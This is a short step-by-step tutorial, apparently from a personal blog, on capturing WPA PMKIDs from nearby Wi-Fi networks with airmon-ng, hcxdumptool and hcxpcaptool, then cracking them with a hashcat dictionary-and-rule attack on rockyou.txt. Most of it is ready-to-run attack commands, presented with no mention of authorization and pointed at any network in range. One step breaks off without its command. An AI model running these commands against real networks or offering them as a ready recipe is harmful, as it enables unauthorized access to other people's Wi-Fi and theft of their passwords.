First of all, check which adapter you're going to use; it must support 'monitor' mode.
Double-check that your wlan adapter is down. (I'm going to refer to wlan0 from now on.)
ifconfig wlan0 down
Now stop the following services, since they can interfere with hcxdumptool's channel switching.
service network-manager stop
service wpa_supplicant stop
Put the interface in monitor mode.
airmon-ng start wlan0
Start dumping the packets; --enable_status 3 also shows captured EAPOL and PROBEREQUEST/PROBERESPONSE frames in the status output.
hcxdumptool -o testing.pcapng -i wlan0mon --enable_status 3
Just wait for a while and keep an eye on the bottom status bar.
Look for the 'pwned' tag. It tells you approximately how many PMKIDs have been captured.
Grab some java while you wait, it won't take long to capture though.
After you've been sniffing the airways for a while, stop the capture by using
Now extract the PMKIDs and name the output file *.16800; you'll see why in the next step.
hcxpcaptool -E essids -z testing.16800 testing.pcapng
There are multiple ways to brute-force or run a dictionary attack; I prefer hashcat.
It makes great use of my graphics cards.
hashcat -m 16800 testing.16800 -w 4 -a 0 --force --potfile-path=testing.pot -r '/rules/hob064.rule' '/dict/rockyou.txt'
As you can see, I use a rule and a dictionary. I'll post another page on why I use certain rulesets and dictionaries and how to get them.
This is the waiting part: the longer the password (minimum length is 8 for WPA), the more time the brute-force/dictionary/rainbow-table attack will take.
The cracked password(s) will be put into the 'testing.pot' file.